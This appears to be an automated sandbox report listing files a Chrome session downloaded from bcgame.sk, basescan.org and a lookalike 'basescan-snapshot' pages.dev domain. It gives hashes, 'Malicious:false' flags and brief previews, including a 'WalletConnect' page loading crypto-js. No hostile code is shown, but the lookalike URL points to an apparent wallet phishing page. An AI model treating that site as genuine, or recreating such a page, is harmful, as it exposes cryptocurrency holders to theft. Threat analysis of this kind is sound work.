                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1102
                                                                                                                                                                                                                                              Entropy (8bit):7.756541151195917
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:8QcUG5Eth8l5pn0ZIRv7Lx6Pcxzt0pPgVRYJINKD9ADSJSjCv4u:Jsg8ln0Mjc0xzt0s0INPDNW4u
                                                                                                                                                                                                                                              MD5:7383D18AC2354B6E1A14176BCB60BE94
                                                                                                                                                                                                                                              SHA1:AA529BD62E27F4EC436B0B19CAFCD125E1F8A03F
                                                                                                                                                                                                                                              SHA-256:17887F3F56D2014E45BB2B4C9C18DB3FEE1E279C20DB8F115E9B957B0BF4F992
                                                                                                                                                                                                                                              SHA-512:CB68EF93272572307CFA98D49BD538AA1EC3508C8D5A8FBAED8E481B23BCCBCCD7474D3BBDC35180577DFAC4CEDEE35EB4DD5A3EDDC6497510E603853BC583C1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/google_pay-FVJ2d1pF.png
                                                                                                                                                                                                                                              Preview:RIFFF...WEBPVP8L9.../x.../.(.dY.~..[A..1...p....H.]...d..3...=[.....$I............W.8.m.J6..4 .60.M>.l...L.6........H..2.....t....o;.G16..N.....u.[_..'l..}y_.k.........l............Bq.P..U.`.@...........y...Wg|&.DJ.TB.!..,F.4.R....I+i.4.^..h..~....W^...\@(.(.2CS..L.......+....C..)!\.JQ{..... A.DM).@`(P$@...BP.mm....yef.TV......\.8.....r.".o....}._.b.....l.j.Ge.V'.....[......9..f@....X@..?.V;...W.....)..K.|h[?.x.o.;6._..f..R9F...@......\......K.I......\9Wn..........v..B.h.....R..{.......CCC?-r.5..d>"..{.)...\.........{q?.@ ...K.. ..Z..Y..R...O+.#..!....8.4..)#..s.*\^..t..h..g.....@#+..*...*xV...............J..f.@}0..$)...w.O....AG.'P.&.K..m...4l.....2'...{.0....-..K...Z....`zzz....L.....@...........>.#...^!....M...X.4........{\.b.......M..f.9.._I..T...o{].=...]...".cd...........v..E...~Q..:.2'...F!.U...{.r.....T...V..#...P..b.{.\..72..D++.r(...tT...=x....g.O..{..H.M..8..y..z5:.....[..:E../...R..z..?Z.{....0E...!._..j..S..._.......K..U.s.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (9067), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9166
                                                                                                                                                                                                                                              Entropy (8bit):5.096624346064397
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:06IMH3HEG9JVwkHg4LyAal318/NYusfkApXMdgmkpj:0y0G9J1zG3eFYP/XMmmkpj
                                                                                                                                                                                                                                              MD5:722242F7B6E0FA3B8D25070388A5C826
                                                                                                                                                                                                                                              SHA1:D62DCB0905E038E69FF24AB9EEF9E3306D45535E
                                                                                                                                                                                                                                              SHA-256:21708DB6D7F8E20387183D7358648065DC45F7D635370FEDB24DF591F68F1E6B
                                                                                                                                                                                                                                              SHA-512:29264704D320B74A88F030D0B6586F0E27D03F7F8CAC684A862C0CD18D3359DA09553DD78A67C47371C7E158E3964A6E33FF71F5545326612003DCF13854FDE2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/clipboard/dist/clipboard.min.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:/*!.. * clipboard.js v2.0.11.. * https://clipboardjs.com/.. *.. * Licensed MIT . Zeno Rocha.. */..!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?exports.ClipboardJS=e():t.ClipboardJS=e()}(this,function(){return n={686:function(t,e,n){"use strict";n.d(e,{default:function(){return b}});var e=n(279),i=n.n(e),e=n(370),u=n.n(e),e=n(817),r=n.n(e);function c(t){try{return document.execCommand(t)}catch(t){return}}var a=function(t){t=r()(t);return c("cut"),t};function o(t,e){var n,o,t=(n=t,o="rtl"===document.documentElement.getAttribute("dir"),(t=document.createElement("textarea")).style.fontSize="12pt",t.style.border="0",t.style.padding="0",t.style.margin="0",t.style.position="absolute",t.style[o?"right":"left"]="-9999px",o=window.pageYOffset||document.documentElement.scrollTop,t.style.top="".concat(o,"px"),t.setAttribute("readonly",""),t.value=n,t);return e.container.appendChild(t
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2811)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2812
                                                                                                                                                                                                                                              Entropy (8bit):5.1504442433530855
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:zXi5WPeo9WF3olW6oJWSogWWonW8Io+EWttopfW+XomWWoLW93oJWYqolWAolWNS:zne5KiDJxIdXrDvoz2Jz1XkGRvctRnmv
                                                                                                                                                                                                                                              MD5:39DBFED5D42470AA3030F4ACAF6CF64E
                                                                                                                                                                                                                                              SHA1:282A155C39570CAE5CD573EFE31AF34A2EE62069
                                                                                                                                                                                                                                              SHA-256:17043CF2159DAE3A8FA8A87E6839000EF45211BD71D8015C19F53931C687CB2A
                                                                                                                                                                                                                                              SHA-512:01A4760E93860860C60A666C151AD1C974A39F372E70A7F80ED2E88E577C31CD784AEEA44C48D97F9E65609D89E51D2D165029DD05BB500B53A34D196E729497
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/i18n-fcfac1d2.js
                                                                                                                                                                                                                                              Preview:import{a4 as t,a5 as _}from"./manifest-51a3674f.js";const{t:i,Trans:n}=t(Object.assign({"../locales/ar-SA/index.json":()=>_(()=>import("./index-1d0339a0.js"),[]).then(e=>e.default),"../locales/bn-BD/index.json":()=>_(()=>import("./index-9ef743e1.js"),[]).then(e=>e.default),"../locales/de-DE/index.json":()=>_(()=>import("./index-497db49b.js"),[]).then(e=>e.default),"../locales/en-IN/index.json":()=>_(()=>import("./index-ca834a8e.js"),[]).then(e=>e.default),"../locales/en-US/index.json":()=>_(()=>import("./index-c45e23bc.js"),[]).then(e=>e.default),"../locales/es-ES/index.json":()=>_(()=>import("./index-e8926bf8.js"),[]).then(e=>e.default),"../locales/fa-IR/index.json":()=>_(()=>import("./index-76a8b653.js"),[]).then(e=>e.default),"../locales/fi-FI/index.json":()=>_(()=>import("./index-e25014bf.js"),[]).then(e=>e.default),"../locales/fil-PH/index.json":()=>_(()=>import("./index-8bdbb9bf.js"),[]).then(e=>e.default),"../locales/fr-FR/index.json":()=>_(()=>import("./index-9baa4258.js"),[]).
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):174103
                                                                                                                                                                                                                                              Entropy (8bit):5.441939866913145
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:ev+5y7XWGSGbvn5RMbOJdZz88cYgSGbvC:ev+5W5ReOJdZ4zYF
                                                                                                                                                                                                                                              MD5:80A9C511F2F68CE3670BF36EFAC37324
                                                                                                                                                                                                                                              SHA1:2CB66F3CFACD9DBCDDD28472B118C551C6C13EEB
                                                                                                                                                                                                                                              SHA-256:5B797D764D3F2E300A2C14B61C812EA5ED272098A0FF2BAC1E4FC65E304C6AD4
                                                                                                                                                                                                                                              SHA-512:0A400B73AA65CD9B040C4033059857067CF05FEFCD6EFDD41BBD1C38CC16D109595953CF54BB5CAACF05CBE9D3940417CB69090E7D545E46956612B71FD8933F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/js/custom/web3-utils.min.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:!function(t){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).Web3Utils=t()}}(function(){return function o(u,s,h){function a(r,t){if(!s[r]){if(!u[r]){var i="function"==typeof require&&require;if(!t&&i)return i(r,!0);if(f)return f(r,!0);var e=new Error("Cannot find module '"+r+"'");throw e.code="MODULE_NOT_FOUND",e}var n=s[r]={exports:{}};u[r][0].call(n.exports,function(t){return a(u[r][1][t]||t)},n,n.exports,o,u,s,h)}return s[r].exports}for(var f="function"==typeof require&&require,t=0;t<h.length;t++)a(h[t]);return a}({1:[function(t,r,i){"use strict";i.byteLength=function(t){var r=p(t),i=r[0],e=r[1];return 3*(i+e)/4-e},i.toByteArray=function(t){for(var r,i=p(t),e=i[0],n=i[1],o=new c((a=e,f=n,3*(a+f)/4-f)),u=0,s=0<n?e-4:e,h=0;h<s;h+=4)r=l[t.charCodeAt(h)]<<18|l[t.charCodeAt(h+1)]<<12|l[t.charCod
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):29728
                                                                                                                                                                                                                                              Entropy (8bit):7.9921700301307625
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:384:Q+MI/5zYhjJk2Wlt7yndqRe3DOrrGhkcl5713FNQFCsQ84CgsMa/nmX4o3I6Haqh:hBwkHlA4RwmCRl57+Cf8J/SFxHaLW
                                                                                                                                                                                                                                              MD5:8F53141B2A888C21891B8E4CEA03A75D
                                                                                                                                                                                                                                              SHA1:DB56D960EEEEA1B37F193AAB5F6488E3B5503C72
                                                                                                                                                                                                                                              SHA-256:B0ADB573012C7544FDEEB9C8DEE7DDA0981B8D036EAE57CF10744581AC2BADCB
                                                                                                                                                                                                                                              SHA-512:19AD6C057AA389F834F2F165CC3A77EF4BBD1525DF0307234341A2F18CD1EA2347159A72C2336A7C8846D8B302DCE58033895B78FA86DD991060FFBA785BE2C9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/platform-sigma-asia-2023-B6RzAtED.png
                                                                                                                                                                                                                                              Preview:RIFF.t..WEBPVP8L.t../..=...).l.J...3Y@..E....?..).$GRD...p8.?..p.-fv;aE..Z..}.....5`......M$.Q.....~e....13..a...^.\?/.M0U.Vqf.B..N".........p`....pP..!...A..p....T".(..B..h........2.U2.$_.q..zK..E<.oe.B...<..!B.J.Q(.N>e.`a[.5..^.Aw......G.z.W!=.?>..f#=.t.X..../.I]...w..sV=o.[v.'.$...:...c..6.0...~mQk.&..|.~.mUh...B.%}k...../.G.*.V.....,8NP.!...`*...K.m...d.N$.HxjMh.9..PD.T.iE..&=.F.Q.j.3...aD]8.&...pk..hmq......<.}d............nj....~........U4}...T.rz..w...V.U..{..MVob{..5.Bz8.=.....b.....&#G2....u..d..R.|..Z..Z..............C1.2"$...5....v?...y...r..m.?..."b..'..m...v.......~....I......[9..A...1Iv2<.K9.8.)....SihU........0.{......~}~..D...m.u..-...v..qqIK..c[.9..%..G.S.*.@.....A.x.2.'~R.....d.....X.v..w..}.".O.....%m.5Hl......'.i.^9....?+.@......!7.e.D...j..\..w........T..B...Z.,*hG.....U.J?.{..=G....{#./..m:..A.Q..sH.>=..-...m..c..l|....7.U[......n...6....Edj.!.G...U...[s.yq..Z+...m.... Dl....=..|+.....m.r.WG..93.m...dLV.9g.....H@
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 267, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):27595
                                                                                                                                                                                                                                              Entropy (8bit):7.979382220552767
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:KKnQaVpvYXApKeAu2nGJQaE2hxBH4eOXCIiiJIL5kVgdfJCrC6elcNUq3ioQX:pnQCvYzGZuZJILqWxJ/Rpq3DQX
                                                                                                                                                                                                                                              MD5:50CE00F49D267100C548542C3CA6ACEF
                                                                                                                                                                                                                                              SHA1:5E631824A98D3769097EDDDF80BC72A0F05421F1
                                                                                                                                                                                                                                              SHA-256:0E5AAA64C3BB42C8252CB69BF7A369ED1C0BF755CB1D05D59EFA02AD3DD13BCC
                                                                                                                                                                                                                                              SHA-512:4BAF07A5567082745F1C7B560C022245E0228CFA7E4768F666E5F0194D80E6AC62B0DDD451A72439AF8AE3A4C9D95E1DDA17EC829EAC4C90E25AB44BE3E90423
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...............9.....sRGB.........PLTE...........N..K.....E.....C..H..Q......!#3...]7...!..*.....F.#T%..8...\^V2.O-.G(. %z..G...)/.@!.f>.F(./.....$'Y6../...........'.....]<(U-1.ab...fB,@"..XT>%....NN.RP..F.RXpF&..;]-%.w.HKmJ3.~.....hL0.T6$.~b.VZNQiQ' (+@..+.'.VO.../3I.FPgB>.^@{O-.k....yDHc...5:S.rxR9.#I.......aV...DC..~.nU#.!+/].s..H16be3+.QB...!qC.3.y].X7../............fEw@<\98....^N~XE..._X^.2Om94../...oG..>BZ...cK.sV.hQ.......1..i.."RD....SQS*Yd.he...7>g...('N1,0;!-....wP...qLE.@...yP;>...@Gq'4XCCB.aJ.Z..6..P.:.....ddnJRw...zz.gZ.M^.RZ~.xs{ac.ua.qZY.q.....[..N..^..L.xD.pT.F..............jhlr..!....^p.`KK.sr..%A%Q..QqqtBdq.j.....<<...[e..&4MfO..?..h^i.W'F......>H... ..00C..Y1.....`.....*D.F.....ox.0d.;.FL~p....L.#!.9/,.<}..[.p-.g........E.OB...Sh....d.$.....a.1.....]..... .IDATx^...|....9.>:...ig...?.,i...xO.......%C...GZ.8.....R.......Im....6..@...G...11..P..t......\...^...{}.3.%...}.7..!.......W.={.n.|....../.|yiii..K./_..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):102
                                                                                                                                                                                                                                              Entropy (8bit):4.603202452431829
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:TMQLeX0axAJDOVAoXN/GzkXXEDUGXseXBF/FEZCMYwn:AeCVAKN/nHEDUGXseb+ZCMYwn
                                                                                                                                                                                                                                              MD5:939CC827F6BA302E0F81F34B9E1C8F8B
                                                                                                                                                                                                                                              SHA1:6A18F9FD5F73AA9B8E18BE37160F70266289C70A
                                                                                                                                                                                                                                              SHA-256:56C93410C118BAB095E6A3DFC0B6291B68932F0E8F0154CF569199FA19DE0CAE
                                                                                                                                                                                                                                              SHA-512:C08D5316656DF6A95165B6836F60F06AEB0ECD7FC9002478E4E3F53B3FAD05FA34C01FE875B7D4DB0222F68E5FFD1AC74769CFE3F4320F853841EE5E82BC7E84
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:function i(r){return r!=null&&typeof r=="object"}var a=Array.isArray;const s=a;export{i as a,s as i};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 120 x 48, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):936
                                                                                                                                                                                                                                              Entropy (8bit):7.4479311862940385
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:AuiZm0vkL3PT9uyFcbYt0RFMTslpMMFn9:AuiZgZnFcEov9
                                                                                                                                                                                                                                              MD5:AB431FBEE49937561CD646CD4AB98CB6
                                                                                                                                                                                                                                              SHA1:7DA44570ECC227356DE03332B93AB1A50CDF4675
                                                                                                                                                                                                                                              SHA-256:CE063AC3BE9F6A8610D06E0077D63958267BB86BF171773FE3C58E625E0956F7
                                                                                                                                                                                                                                              SHA-512:F449E671F0C5F43D590AFE25D479CC6150C703D073FE35A7FA23C463257BC0E90E733F8DA66384FC8E18714B2E191DEA30BDE59B876C1BFA29D4709D478966C1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...x...0......N.....sRGB.........gAMA......a....uPLTE........................................................................................................................6...'tRNS...`...`..p......@...0o.P.Pp.0 .. @t"H6....IDATx....0.E.e...'..`.i..OL.}K..C*.a.<1c..oc........d.V..q...xK.'.s!...b......$!....n[.s.7.}b.{P.N...1......_?m`..as%z8b.~.t.:Gw..m.g..s.k.4.K.X.1.....#-c......o.I...X..6?..g=.8.QA...+.O.14..<..3b..9...i..X........`cg.%{*_9.._.GS@......c...^.. v...X....%.:..B.S....v..g..0.G|.^.u.qr.....9......R.-...Y..pqV<bX.1.u....8..MK..L...^....Tl\...eZ.....Z.A;.XB>N..b..!....b...1.=. F..x...6.G...........7..XU..8'O..b.K.fC...f../.}KX..G.bR.3!.A...u.IH......,...YD/...l.T...%w..%......Bl.....b<...o.M1.t.1Idp.Xs..\yR^.].+,s*.QE....1...W....`.8.2\.....n.(.qn...a..A<.F}e"v.."qd'..n6....Gi..O.......C.....Lz...,k.......?.......=V.....h.....V.m<...x.?s.1...d+....IEND.B`.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1642)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2048
                                                                                                                                                                                                                                              Entropy (8bit):4.886762545251135
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:9tC4Us/SE8XOOHM0v2tJV6mlq/AbZPUN0SkGSOo:Dos/STXOOs22tz6mmQZPKDE7
                                                                                                                                                                                                                                              MD5:BB2C85890FBC43EB00D54A814058C3B1
                                                                                                                                                                                                                                              SHA1:15FD820F705252A655576464961B08BDC110619A
                                                                                                                                                                                                                                              SHA-256:72E7C8E5913668ACA3804CED58F07497C8C326830604BC8A3A7A2057F75123AB
                                                                                                                                                                                                                                              SHA-512:ECCE14BFEECB4AD07CA630693013B6033B2919056B5E87197A2C885B30B46B15FCF8FF9111A1562EBCDD5B2DD6F6F58D2AA82680DEC684F147D01654DFE2EC0F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/js/components/hs.clipboard.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSClipboard={_baseConfig:{},pageCollection:$(),init:function(selector,config){this.collection=selector&&$(selector).length?$(selector):$();if(!$(selector).length)return;this.config=config&&$.isPlainObject(config)?$.extend({},this._baseConfig,config):this._baseConfig;this.config.itemSelector=selector;this.initClipboard();return this.pageCollection;},initClipboard:function(){var $self=this,collection=$self.pageCollection,shortcodeArr={};$('[data-content-target]').each(function(){var $this=$(this),contentTarget=$this.data('content-target');if($(contentTarget).is('input, textarea, select')){shortcodeArr[contentTarget]=$(contentTarget).val()}else{shortcodeArr[contentTarget]=$(contentTarget).html();}});this.collection.each(function(i,el){var windW=$(window).width(),$this=$(el),defaultText=$this.get(0).lastChild.nodeValue,classChangeTarget=$this.data('class-change-target'),defaultClass=$this.data('default-class'),title=$this.attr('title'),type=$t
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html
